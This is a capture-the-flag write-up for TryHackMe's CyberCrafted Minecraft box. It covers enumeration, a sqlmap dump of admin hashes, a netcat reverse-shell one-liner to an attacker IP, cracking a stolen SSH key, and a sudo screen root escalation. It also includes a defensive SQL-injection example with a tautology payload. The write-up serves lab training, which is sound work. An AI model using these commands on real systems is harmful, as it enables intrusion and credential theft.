Pwn this pay-to-win Minecraft server!
CyberCrafted is a Medium-level CTF from TryHackMe. It requires fairly extensive enumeration but remains accessible to beginners. The privilege escalation is pretty cool.
Command:
nmap -T5 10.10.235.114
Three ports are open: SSH, HTTP, and port 25565, which hosts the Minecraft server.
dirsearch -u 10.10.181.45
Dirsearch reveals the website's domain name: http://cybercrafted.thm/
echo '10.10.181.45 cybercrafted.thm' >> /etc/hosts
Command:
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.cybercrafted.thm" -u http://cybercrafted.thm/ -fs 0
Three subdomains come back and need to be enumerated with dirsearch. First, they must be added to the hosts file.
Command:
dirsearch -u http://admin.cybercrafted.thm/
The page http://admin.cybercrafted.thm/login.php asks for credentials that we do not have, and the login does not appear to be vulnerable (no authentication bypass).
dirsearch -u http://store.cybercrafted.thm/
The page http://store.cybercrafted.thm/search.php lets us perform a search. This page is vulnerable to SQL injection (SQLi).
To exploit it automatically, intercept a search request in Burp Suite, save it to a file, and feed that file to sqlmap.
Initial command to test the vulnerability:
sqlmap -r req.req
Final command (dump credentials):
sqlmap -r req.req --dbms=mysql -D webapp -T admin --dump
Pasting the hash into https://crackstation.net/ gives us the password.
Once logged in to the admin site, we can enter system commands.
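For the defending side, here is an added example (not code from the challenge or from the original post) of the class of flaw behind search.php: a query built by string concatenation beside its parameterized equivalent, run against a constructed in-memory SQLite stand-in for the store database (table and column names are assumptions, the hash value is a placeholder).

```python
import sqlite3

# Constructed stand-in for the store's database: a product table that the
# search page queries, plus an admin table holding a placeholder hash.
def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT, price REAL);
        INSERT INTO items (name, price) VALUES
            ('Diamond Sword', 9.99), ('Elytra', 19.99), ('Creeper Plush', 4.50);
        CREATE TABLE admin (id INTEGER PRIMARY KEY, user TEXT, hash TEXT);
        INSERT INTO admin (user, hash) VALUES ('admin', 'PLACEHOLDER_HASH');
    """)
    return conn

def search_vulnerable(conn: sqlite3.Connection, term: str) -> list:
    # User input is spliced straight into the statement: a quote in the
    # input closes the string literal and whatever follows is parsed as SQL.
    sql = f"SELECT name, price FROM items WHERE name LIKE '%{term}%'"
    return conn.execute(sql).fetchall()

def search_safe(conn: sqlite3.Connection, term: str) -> list:
    # Bound parameter: the value travels separately from the statement text,
    # so quotes and comment markers in the input are just characters to match.
    sql = "SELECT name, price FROM items WHERE name LIKE ?"
    return conn.execute(sql, (f"%{term}%",)).fetchall()

# Constructed test input: closes the literal, makes the WHERE clause always
# true, and comments out the rest of the statement.
TAUTOLOGY = "' OR 1=1 -- "

if __name__ == "__main__":
    db = build_db()
    print(search_vulnerable(db, "Sword"))    # one legitimate hit
    print(search_vulnerable(db, TAUTOLOGY))  # every row: the filter is bypassed
    print(search_safe(db, TAUTOLOGY))        # no rows: no product has that literal name
```

The same separation of data from statement text is what stops sqlmap's automated dump from reaching other tables such as the admin credentials.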
Command:
id
Since system commands can be executed, chances are we can get a reverse shell.
Command:
rm f;mkfifo f;cat f|/bin/sh -i 2>&1|nc 10.11.38.124 1234 > f
Once the reverse shell has been caught by nc, we are running as the www-data account. In /home there is the account xXUltimateCreeperXx, which holds a nice private key, id_rsa.
Command:
ssh xXUltimateCreeperXx@127.0.0.1 -i id_rsa
The private key is protected by a passphrase. To crack it, we use ssh2john. First, we copy the key to the Kali machine.
Command:
scp id_rsa root@10.11.38.124:/root/trytohackme/cybercraft/
Commands to crack the key:
ssh2john id_rsa > id_rsa.hash
john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
Once on the xXUltimateCreeperXx account, and given the questions TryHackMe asks, you have to find where the Minecraft server is installed.
It is in /opt (nothing too rocket science).
After listing the subfolders and files, the password for the cybercrafted account can be found at /opt/minecraft/cybercrafted/plugins/LoginSystem/log.txt
Command to switch to the cybercrafted account:
su cybercrafted
First command to run:
sudo -l
The user is allowed to run /usr/bin/screen -r cybercrafted as root.
Command:
sudo /usr/bin/screen -r cybercrafted
And we get this window:
To switch to the root account, use these keyboard shortcuts: Ctrl+A then Ctrl+C. Screen opens a new window with a shell, and since screen was started through sudo, that shell runs as root.
That’s all folks
Thank you for taking the trouble to come to the site and read this write-up.
I hope it helped you and taught you something new.
Please feel free to leave a comment or share this article.